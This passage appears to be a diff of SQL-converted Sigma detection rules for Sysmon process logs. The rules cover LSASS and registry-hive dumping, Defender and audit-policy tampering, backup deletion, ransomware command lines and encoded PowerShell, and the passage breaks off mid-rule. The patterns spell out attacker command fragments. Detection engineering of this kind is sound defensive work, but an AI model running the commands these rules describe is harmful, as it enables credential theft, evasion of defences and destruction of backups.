+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 
'%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - 
"Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": 
"Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 
'%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE 
'\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": 
"c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' 
ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 
'%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR 